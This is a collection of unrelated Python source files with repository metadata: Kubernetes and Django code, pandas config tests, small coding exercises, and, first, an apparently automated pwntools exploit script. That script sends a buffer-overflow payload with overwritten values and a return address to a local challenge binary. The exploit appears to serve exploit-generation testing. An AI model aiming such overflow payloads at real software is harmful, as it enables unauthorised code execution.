894fb7bca92442fa7ede87e3eb4fb9460d48dac3 | 077a17b286bdd6c427c325f196eb6e16b30c257e | /00_BofVar-unit-tests/05_64/remenissions-work/exploit-BofFunc-55.py | aaa5881a3250fe6ea97d12a84f892bc0bf2bb8f1 | [] | no_license | KurSh/remenissions_test | 626daf6e923459b44b82521aa4cb944aad0dbced | 9dec8085b62a446f7562adfeccf70f8bfcdbb738 | refs/heads/master | 2023-07-08T20:25:04.823318 | 2020-10-05T06:45:16 | 2020-10-05T06:45:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 918 | py | from pwn import *
import time
import sys
import signal
import sf
target = process("./chall-test_BofVar-05-x64")
gdb.attach(target, execute="verify_exploit")
bof_payload = sf.BufferOverflow(arch=64)
bof_payload.set_input_start(0x58)
bof_payload.add_int32(0x20, 0xdead)
bof_payload.add_int32(0x1c, 0xbef1)
bof_payload.add_int32(0x18, 0xfacadf)
bof_payload.add_int32(0x14, 0xbeef)
bof_payload.add_int32(0x10, 0xfacade)
bof_payload.add_int32(0xc, 0xdeae)
bof_payload.set_ret(0x400537)
payload = bof_payload.generate_payload()
target.sendline(payload)
# Exploit Verification starts here 15935728
def handler(signum, frame):
raise Exception("Timed out")
def check_verification_done():
while True:
if os.path.exists("pwned") or os.path.exists("rip"):
sys.exit(0)
signal.signal(signal.SIGALRM, handler)
signal.alarm(2)
try:
while True:
check_verification_done()
except Exception:
print("Exploit timed out")
| [
"[email protected]"
] | |
c2f713bbc9cad80955d03476244f66543e606652 | 16047f965a69893a8cd2c8d18fbd7b9c86a07eb3 | /src/kubernetes/client/models/v1beta1_role.py | 2c1a21b5a2042eac6ef9b08e9bd6650f618215a2 | [
"Apache-2.0",
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | guctum/aws-kube-codesuite | 9ce2cc02fe5fa15c2e175fb697138014fb162f1e | 5d62beaadc13bec745ac7d2fc18f07805e91cef3 | refs/heads/master | 2021-05-24T10:08:00.651840 | 2020-04-23T20:21:46 | 2020-04-23T20:21:46 | 253,511,083 | 0 | 0 | Apache-2.0 | 2020-04-06T13:48:14 | 2020-04-06T13:48:13 | null | UTF-8 | Python | false | false | 6,072 | py | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1Role(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self, api_version=None, kind=None, metadata=None, rules=None):
"""
V1beta1Role - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'api_version': 'str',
'kind': 'str',
'metadata': 'V1ObjectMeta',
'rules': 'list[V1beta1PolicyRule]'
}
self.attribute_map = {
'api_version': 'apiVersion',
'kind': 'kind',
'metadata': 'metadata',
'rules': 'rules'
}
self._api_version = api_version
self._kind = kind
self._metadata = metadata
self._rules = rules
@property
def api_version(self):
"""
Gets the api_version of this V1beta1Role.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1beta1Role.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1beta1Role.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1beta1Role.
:type: str
"""
self._api_version = api_version
@property
def kind(self):
"""
Gets the kind of this V1beta1Role.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1beta1Role.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1beta1Role.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1beta1Role.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1beta1Role.
Standard object's metadata.
:return: The metadata of this V1beta1Role.
:rtype: V1ObjectMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1beta1Role.
Standard object's metadata.
:param metadata: The metadata of this V1beta1Role.
:type: V1ObjectMeta
"""
self._metadata = metadata
@property
def rules(self):
"""
Gets the rules of this V1beta1Role.
Rules holds all the PolicyRules for this Role
:return: The rules of this V1beta1Role.
:rtype: list[V1beta1PolicyRule]
"""
return self._rules
@rules.setter
def rules(self, rules):
"""
Sets the rules of this V1beta1Role.
Rules holds all the PolicyRules for this Role
:param rules: The rules of this V1beta1Role.
:type: list[V1beta1PolicyRule]
"""
if rules is None:
raise ValueError("Invalid value for `rules`, must not be `None`")
self._rules = rules
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1beta1Role):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| [
"[email protected]"
] | |
ed0430a62d28f4125e637ff3312f7676ec05f87e | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_247/ch7_2020_09_02_20_17_45_778734.py | bb2bde7727968a017b1f9750c6aa7f2d2bd26672 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 68 | py | def calcula_area_do_triangulo (b, h):
y= ((b*h)/2)
return y
| [
"[email protected]"
] | |
5ef75da1022655c5bd6ac835508068ef14abd034 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_fountains.py | 8f3662dc38b64b11ddca5e07e700a81c35dac24f | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 230 | py |
#calss header
class _FOUNTAINS():
def __init__(self,):
self.name = "FOUNTAINS"
self.definitions = fountain
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['fountain']
| [
"[email protected]"
] | |
73eac1e22433ab4eea9aca1376ba592b36c8a766 | b162de01d1ca9a8a2a720e877961a3c85c9a1c1c | /19.remove-nth-node-from-end-of-list.python3.py | 3b4c3c3f89c9d6b3ace1f623eb8f445776978c96 | [] | no_license | richnakasato/lc | 91d5ff40a1a3970856c76c1a53d7b21d88a3429c | f55a2decefcf075914ead4d9649d514209d17a34 | refs/heads/master | 2023-01-19T09:55:08.040324 | 2020-11-19T03:13:51 | 2020-11-19T03:13:51 | 114,937,686 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 900 | py | #
# [19] Remove Nth Node From End of List
#
# https://leetcode.com/problems/remove-nth-node-from-end-of-list/description/
#
# algorithms
# Medium (33.66%)
# Total Accepted: 320.9K
# Total Submissions: 953.4K
# Testcase Example: '[1,2,3,4,5]\n2'
#
# Given a linked list, remove the n-th node from the end of list and return its
# head.
#
# Example:
#
#
# Given linked list: 1->2->3->4->5, and n = 2.
#
# After removing the second node from the end, the linked list becomes
# 1->2->3->5.
#
#
# Note:
#
# Given n will always be valid.
#
# Follow up:
#
# Could you do this in one pass?
#
#
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head, n):
"""
:type head: ListNode
:type n: int
:rtype: ListNode
"""
| [
"[email protected]"
] | |
2480aceae6ae2ba2e2a15b9c72c5bc82b9962eb7 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02939/s369857416.py | 52d015695e7208d99d4fc5b060a39a9e61059cf9 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 152 | py | S = input()
ans = 0
x = ''
y = ''
for i in S:
x += i
if x == y:
pass
else:
ans += 1
y = x
x = ''
print(ans) | [
"[email protected]"
] | |
245197b0595c935756ec65fe267b78539b1a40ca | 7a88fc18f30d5dd3ac935877d4d9268a56c296be | /di_website/vacancies/migrations/0014_auto_20190814_1527.py | d83551c3c570dff4336656f37419b42c8c1ef8cb | [] | no_license | devinit/DIwebsite-redesign | 745a480b7ba0feffa34dc664548ee4c5a7b4d470 | 9ec46823c67cdd4f35be255896bf30d8f6362666 | refs/heads/develop | 2023-08-30T04:06:20.951203 | 2023-08-07T12:06:07 | 2023-08-07T12:06:07 | 184,287,370 | 1 | 0 | null | 2023-08-28T14:34:57 | 2019-04-30T15:29:25 | HTML | UTF-8 | Python | false | false | 3,075 | py | # Generated by Django 2.2.2 on 2019-08-14 15:27
from django.db import migrations
import wagtail.blocks
import wagtail.fields
import wagtail.documents.blocks
import wagtail.embeds.blocks
import wagtail.images.blocks
class Migration(migrations.Migration):
dependencies = [
('vacancies', '0013_auto_20190813_1221'),
]
operations = [
migrations.AlterField(
model_name='vacancypage',
name='body',
field=wagtail.fields.StreamField([('paragraph_block', wagtail.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'ol', 'ul', 'link', 'document', 'image', 'embed'], icon='fa-paragraph', template='blocks/paragraph_block.html')), ('section_paragraph_block', wagtail.blocks.StructBlock([('text', wagtail.blocks.RichTextBlock(features=['h2', 'h3', 'h4', 'bold', 'italic', 'ol', 'ul', 'link', 'document', 'image', 'embed'])), ('center', wagtail.blocks.BooleanBlock(default=False, required=False))])), ('block_quote', wagtail.blocks.StructBlock([('text', wagtail.blocks.TextBlock())])), ('section_block_quote', wagtail.blocks.StructBlock([('text', wagtail.blocks.TextBlock()), ('center', wagtail.blocks.BooleanBlock(default=False, required=False))])), ('banner_block', wagtail.blocks.StructBlock([('image', wagtail.images.blocks.ImageChooserBlock(required=False)), ('video', wagtail.embeds.blocks.EmbedBlock(help_text='Insert an embed URL e.g https://www.youtube.com/embed/SGJFWirQ3ks', icon='fa-s15', required=False, template='blocks/embed_block.html')), ('text', wagtail.blocks.StreamBlock([('text', wagtail.blocks.TextBlock(template='blocks/banner/text.html')), ('list', wagtail.blocks.ListBlock(wagtail.blocks.StructBlock([('title', wagtail.blocks.TextBlock()), ('content', wagtail.blocks.TextBlock(required=False))], template='blocks/banner/list_item.html'), template='blocks/banner/list.html'))])), ('meta', wagtail.blocks.CharBlock(help_text='Anything from a name, location e.t.c - usually to provide credit for the text', required=False)), ('buttons', wagtail.blocks.StreamBlock([('button', wagtail.blocks.StructBlock([('caption', wagtail.blocks.CharBlock(required=False)), ('url', wagtail.blocks.URLBlock(required=False)), ('page', wagtail.blocks.PageChooserBlock(required=False))])), ('document_box', wagtail.blocks.StructBlock([('document_box_heading', wagtail.blocks.CharBlock(icon='title', required=False)), ('documents', wagtail.blocks.StreamBlock([('document', wagtail.documents.blocks.DocumentChooserBlock())], required=False)), ('dark_mode', wagtail.blocks.BooleanBlock(default=False, help_text='Red on white if unchecked. White on dark grey if checked.', required=False))]))], required=False)), ('media_orientation', wagtail.blocks.ChoiceBlock(choices=[('left', 'Left'), ('right', 'Right')], required=False))])), ('button', wagtail.blocks.StructBlock([('caption', wagtail.blocks.CharBlock(required=False)), ('url', wagtail.blocks.URLBlock(required=False)), ('page', wagtail.blocks.PageChooserBlock(required=False))]))], blank=True, null=True, verbose_name='Page Body'),
),
]
| [
"[email protected]"
] | |
ec0cfcecd31f2c6a246a73248820c3d252ee9f33 | 170864b6ec66be48138f231fe8ac3381481b8c9d | /python/BOJ_5585.py | 13ea463165f2037fccae553ad628352c08812824 | [] | no_license | hyesungoh/AA_Algorithm | 5da3d8312d035d324dfaa31eef73f01a238231f3 | d68f52eaa29cfc4656a8b5623359166779ded06e | refs/heads/master | 2023-06-09T14:49:01.402456 | 2021-06-28T10:10:09 | 2021-06-28T10:10:09 | 272,701,231 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 144 | py | n = 1000 - int(input())
coins = [500, 100, 50, 10, 5, 1]
ans = 0
for coin in coins:
t = n // coin
n -= t * coin
ans += t
print(ans)
| [
"[email protected]"
] | |
80891c064ba70a74469236ea3fa95287ff894762 | 209a7a4023a9a79693ec1f6e8045646496d1ea71 | /COMP0016_2020_21_Team12-datasetsExperimentsAna/pwa/FADapp/pythonScripts/venv/Lib/site-packages/pandas/tests/config/test_config.py | 1a7bfb879e6967e2864e3b5cbfb441f9debef077 | [
"MIT"
] | permissive | anzhao920/MicrosoftProject15_Invictus | 5e2347015411bbffbdf0ceb059df854661fb240c | 15f44eebb09561acbbe7b6730dfadf141e4c166d | refs/heads/main | 2023-04-16T13:24:39.332492 | 2021-04-27T00:47:13 | 2021-04-27T00:47:13 | 361,913,170 | 0 | 0 | MIT | 2021-04-26T22:41:56 | 2021-04-26T22:41:55 | null | UTF-8 | Python | false | false | 18,734 | py | import warnings
import pytest
from pandas._config import config as cf
from pandas._config.config import OptionError
import pandas as pd
class TestConfig:
@classmethod
def setup_class(cls):
from copy import deepcopy
cls.cf = cf
cls.gc = deepcopy(getattr(cls.cf, "_global_config"))
cls.do = deepcopy(getattr(cls.cf, "_deprecated_options"))
cls.ro = deepcopy(getattr(cls.cf, "_registered_options"))
def setup_method(self, method):
setattr(self.cf, "_global_config", {})
setattr(self.cf, "options", self.cf.DictWrapper(self.cf._global_config))
setattr(self.cf, "_deprecated_options", {})
setattr(self.cf, "_registered_options", {})
# Our test fixture in conftest.py sets "chained_assignment"
# to "raise" only after all test methods have been setup.
# However, after this setup, there is no longer any
# "chained_assignment" option, so re-register it.
self.cf.register_option("chained_assignment", "raise")
def teardown_method(self, method):
setattr(self.cf, "_global_config", self.gc)
setattr(self.cf, "_deprecated_options", self.do)
setattr(self.cf, "_registered_options", self.ro)
def test_api(self):
# the pandas object exposes the user API
assert hasattr(pd, "get_option")
assert hasattr(pd, "set_option")
assert hasattr(pd, "reset_option")
assert hasattr(pd, "describe_option")
def test_is_one_of_factory(self):
v = self.cf.is_one_of_factory([None, 12])
v(12)
v(None)
msg = r"Value must be one of None\|12"
with pytest.raises(ValueError, match=msg):
v(1.1)
def test_register_option(self):
self.cf.register_option("a", 1, "doc")
# can't register an already registered option
msg = "Option 'a' has already been registered"
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a", 1, "doc")
# can't register an already registered option
msg = "Path prefix to option 'a' is already an option"
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a.b.c.d1", 1, "doc")
with pytest.raises(OptionError, match=msg):
self.cf.register_option("a.b.c.d2", 1, "doc")
# no python keywords
msg = "for is a python keyword"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("for", 0)
with pytest.raises(ValueError, match=msg):
self.cf.register_option("a.for.b", 0)
# must be valid identifier (ensure attribute access works)
msg = "oh my goddess! is not a valid identifier"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("Oh my Goddess!", 0)
# we can register options several levels deep
# without predefining the intermediate steps
# and we can define differently named options
# in the same namespace
self.cf.register_option("k.b.c.d1", 1, "doc")
self.cf.register_option("k.b.c.d2", 1, "doc")
def test_describe_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b", 1, "doc2")
self.cf.deprecate_option("b")
self.cf.register_option("c.d.e1", 1, "doc3")
self.cf.register_option("c.d.e2", 1, "doc4")
self.cf.register_option("f", 1)
self.cf.register_option("g.h", 1)
self.cf.register_option("k", 2)
self.cf.deprecate_option("g.h", rkey="k")
self.cf.register_option("l", "foo")
# non-existent keys raise KeyError
msg = r"No such keys\(s\)"
with pytest.raises(OptionError, match=msg):
self.cf.describe_option("no.such.key")
# we can get the description for any key we registered
assert "doc" in self.cf.describe_option("a", _print_desc=False)
assert "doc2" in self.cf.describe_option("b", _print_desc=False)
assert "precated" in self.cf.describe_option("b", _print_desc=False)
assert "doc3" in self.cf.describe_option("c.d.e1", _print_desc=False)
assert "doc4" in self.cf.describe_option("c.d.e2", _print_desc=False)
# if no doc is specified we get a default message
# saying "description not available"
assert "vailable" in self.cf.describe_option("f", _print_desc=False)
assert "vailable" in self.cf.describe_option("g.h", _print_desc=False)
assert "precated" in self.cf.describe_option("g.h", _print_desc=False)
assert "k" in self.cf.describe_option("g.h", _print_desc=False)
# default is reported
assert "foo" in self.cf.describe_option("l", _print_desc=False)
# current value is reported
assert "bar" not in self.cf.describe_option("l", _print_desc=False)
self.cf.set_option("l", "bar")
assert "bar" in self.cf.describe_option("l", _print_desc=False)
def test_case_insensitive(self):
self.cf.register_option("KanBAN", 1, "doc")
assert "doc" in self.cf.describe_option("kanbaN", _print_desc=False)
assert self.cf.get_option("kanBaN") == 1
self.cf.set_option("KanBan", 2)
assert self.cf.get_option("kAnBaN") == 2
# gets of non-existent keys fail
msg = r"No such keys\(s\): 'no_such_option'"
with pytest.raises(OptionError, match=msg):
self.cf.get_option("no_such_option")
self.cf.deprecate_option("KanBan")
assert self.cf._is_deprecated("kAnBaN")
def test_get_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
# gets of existing keys succeed
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
# gets of non-existent keys fail
msg = r"No such keys\(s\): 'no_such_option'"
with pytest.raises(OptionError, match=msg):
self.cf.get_option("no_such_option")
def test_set_option(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
self.cf.set_option("b.b", 1.1)
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
assert self.cf.get_option("b.b") == 1.1
msg = r"No such keys\(s\): 'no.such.key'"
with pytest.raises(OptionError, match=msg):
self.cf.set_option("no.such.key", None)
def test_set_option_empty_args(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option()
def test_set_option_uneven_args(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option("a.b", 2, "b.c")
def test_set_option_invalid_single_argument_type(self):
msg = "Must provide an even number of non-keyword arguments"
with pytest.raises(ValueError, match=msg):
self.cf.set_option(2)
def test_set_option_multiple(self):
self.cf.register_option("a", 1, "doc")
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("b.b", None, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
assert self.cf.get_option("b.b") is None
self.cf.set_option("a", "2", "b.c", None, "b.b", 10.0)
assert self.cf.get_option("a") == "2"
assert self.cf.get_option("b.c") is None
assert self.cf.get_option("b.b") == 10.0
def test_validation(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("d", 1, "doc", validator=self.cf.is_nonnegative_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_text)
msg = "Value must have type '<class 'int'>'"
with pytest.raises(ValueError, match=msg):
self.cf.register_option("a.b.c.d2", "NO", "doc", validator=self.cf.is_int)
self.cf.set_option("a", 2) # int is_int
self.cf.set_option("b.c", "wurld") # str is_str
self.cf.set_option("d", 2)
self.cf.set_option("d", None) # non-negative int can be None
# None not is_int
with pytest.raises(ValueError, match=msg):
self.cf.set_option("a", None)
with pytest.raises(ValueError, match=msg):
self.cf.set_option("a", "ab")
msg = "Value must be a nonnegative integer or None"
with pytest.raises(ValueError, match=msg):
self.cf.register_option(
"a.b.c.d3", "NO", "doc", validator=self.cf.is_nonnegative_int
)
with pytest.raises(ValueError, match=msg):
self.cf.register_option(
"a.b.c.d3", -2, "doc", validator=self.cf.is_nonnegative_int
)
msg = r"Value must be an instance of <class 'str'>\|<class 'bytes'>"
with pytest.raises(ValueError, match=msg):
self.cf.set_option("b.c", 1)
validator = self.cf.is_one_of_factory([None, self.cf.is_callable])
self.cf.register_option("b", lambda: None, "doc", validator=validator)
self.cf.set_option("b", "%.1f".format) # Formatter is callable
self.cf.set_option("b", None) # Formatter is none (default)
with pytest.raises(ValueError, match="Value must be a callable"):
self.cf.set_option("b", "%.1f")
def test_reset_option(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_str)
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("a")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("b.c")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
def test_reset_option_all(self):
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2", validator=self.cf.is_str)
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
self.cf.set_option("a", 2)
self.cf.set_option("b.c", "wurld")
assert self.cf.get_option("a") == 2
assert self.cf.get_option("b.c") == "wurld"
self.cf.reset_option("all")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b.c") == "hullo"
def test_deprecate_option(self):
# we can deprecate non-existent options
self.cf.deprecate_option("foo")
assert self.cf._is_deprecated("foo")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
with pytest.raises(KeyError, match="No such keys.s.: 'foo'"):
self.cf.get_option("foo")
assert len(w) == 1 # should have raised one warning
assert "deprecated" in str(w[-1]) # we get the default message
self.cf.register_option("a", 1, "doc", validator=self.cf.is_int)
self.cf.register_option("b.c", "hullo", "doc2")
self.cf.register_option("foo", "hullo", "doc2")
self.cf.deprecate_option("a", removal_ver="nifty_ver")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.get_option("a")
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the default message
assert "nifty_ver" in str(w[-1]) # with the removal_ver quoted
msg = "Option 'a' has already been defined as deprecated"
with pytest.raises(OptionError, match=msg):
self.cf.deprecate_option("a")
self.cf.deprecate_option("b.c", "zounds!")
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.get_option("b.c")
assert len(w) == 1 # should have raised one warning
assert "zounds!" in str(w[-1]) # we get the custom message
# test rerouting keys
self.cf.register_option("d.a", "foo", "doc2")
self.cf.register_option("d.dep", "bar", "doc2")
assert self.cf.get_option("d.a") == "foo"
assert self.cf.get_option("d.dep") == "bar"
self.cf.deprecate_option("d.dep", rkey="d.a") # reroute d.dep to d.a
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert self.cf.get_option("d.dep") == "foo"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.cf.set_option("d.dep", "baz") # should overwrite "d.a"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
assert self.cf.get_option("d.dep") == "baz"
assert len(w) == 1 # should have raised one warning
assert "eprecated" in str(w[-1]) # we get the custom message
def test_config_prefix(self):
with self.cf.config_prefix("base"):
self.cf.register_option("a", 1, "doc1")
self.cf.register_option("b", 2, "doc2")
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b") == 2
self.cf.set_option("a", 3)
self.cf.set_option("b", 4)
assert self.cf.get_option("a") == 3
assert self.cf.get_option("b") == 4
assert self.cf.get_option("base.a") == 3
assert self.cf.get_option("base.b") == 4
assert "doc1" in self.cf.describe_option("base.a", _print_desc=False)
assert "doc2" in self.cf.describe_option("base.b", _print_desc=False)
self.cf.reset_option("base.a")
self.cf.reset_option("base.b")
with self.cf.config_prefix("base"):
assert self.cf.get_option("a") == 1
assert self.cf.get_option("b") == 2
def test_callback(self):
k = [None]
v = [None]
def callback(key):
k.append(key)
v.append(self.cf.get_option(key))
self.cf.register_option("d.a", "foo", cb=callback)
self.cf.register_option("d.b", "foo", cb=callback)
del k[-1], v[-1]
self.cf.set_option("d.a", "fooz")
assert k[-1] == "d.a"
assert v[-1] == "fooz"
del k[-1], v[-1]
self.cf.set_option("d.b", "boo")
assert k[-1] == "d.b"
assert v[-1] == "boo"
del k[-1], v[-1]
self.cf.reset_option("d.b")
assert k[-1] == "d.b"
def test_set_ContextManager(self):
def eq(val):
assert self.cf.get_option("a") == val
self.cf.register_option("a", 0)
eq(0)
with self.cf.option_context("a", 15):
eq(15)
with self.cf.option_context("a", 25):
eq(25)
eq(15)
eq(0)
self.cf.set_option("a", 17)
eq(17)
# Test that option_context can be used as a decorator too (#34253).
@self.cf.option_context("a", 123)
def f():
eq(123)
f()
def test_attribute_access(self):
holder = []
def f3(key):
holder.append(True)
self.cf.register_option("a", 0)
self.cf.register_option("c", 0, cb=f3)
options = self.cf.options
assert options.a == 0
with self.cf.option_context("a", 15):
assert options.a == 15
options.a = 500
assert self.cf.get_option("a") == 500
self.cf.reset_option("a")
assert options.a == self.cf.get_option("a", 0)
msg = "You can only set the value of existing options"
with pytest.raises(OptionError, match=msg):
options.b = 1
with pytest.raises(OptionError, match=msg):
options.display = 1
# make sure callback kicks when using this form of setting
options.c = 1
assert len(holder) == 1
def test_option_context_scope(self):
# Ensure that creating a context does not affect the existing
# environment as it is supposed to be used with the `with` statement.
# See https://github.com/pandas-dev/pandas/issues/8514
original_value = 60
context_value = 10
option_name = "a"
self.cf.register_option(option_name, original_value)
# Ensure creating contexts didn't affect the current context.
ctx = self.cf.option_context(option_name, context_value)
assert self.cf.get_option(option_name) == original_value
# Ensure the correct value is available inside the context.
with ctx:
assert self.cf.get_option(option_name) == context_value
# Ensure the current context is reset
assert self.cf.get_option(option_name) == original_value
def test_dictwrapper_getattr(self):
options = self.cf.options
# GH 19789
with pytest.raises(OptionError, match="No such option"):
options.bananas
assert not hasattr(options, "bananas")
| [
"[email protected]"
] | |
5f0784ef8ebaf4b89a25a06905196b48dbd2da46 | db652288d2a5da615c3026cb49e7e66c4c68b2b1 | /website/welree/migrations/0003_auto_20150203_1526.py | 5e8441e2c94dba59036eb731f0ce18162a52c977 | [] | no_license | dhanuagnihotri/Welree-Website | a6b76ba6be47617ff4585fdf254460abc1aa7c59 | 899ed8de4eadc2411b5fee0588a1ed756fb5325e | refs/heads/master | 2021-01-21T03:38:00.119591 | 2015-08-19T17:31:18 | 2015-08-19T17:31:18 | 29,544,497 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 561 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('welree', '0002_customuser_is_designer'),
]
operations = [
migrations.AlterField(
model_name='customuser',
name='is_designer',
field=models.BooleanField(default=False, help_text=b"We'll use this to customize your experience on Welree.", verbose_name=b"I'm a jewelry designer"),
preserve_default=True,
),
]
| [
"[email protected]"
] | |
d6e93df4cf85a0b82684bc63ef054e46fd0cd165 | 6bc7062b2f99d0c54fd1bb74c1c312a2e3370e24 | /crowdfunding/users/permissions.py | 5b18344a04da371391dd876904d9dae8001cae2e | [] | no_license | marinkoellen/drf-proj | f2d1f539efb877df69d285bd2fe6d5e789709933 | 874549d68ab80a774988c83706bb7934e035de42 | refs/heads/master | 2022-12-25T16:53:52.187704 | 2020-10-03T03:54:06 | 2020-10-03T03:54:06 | 289,620,536 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 261 | py | from rest_framework import permissions
class OwnProfile(permissions.BasePermission):
def has_object_permission(self, request, view, obj):
if request.method in permissions.SAFE_METHODS:
return True
return obj == request.user
| [
"[email protected]"
] | |
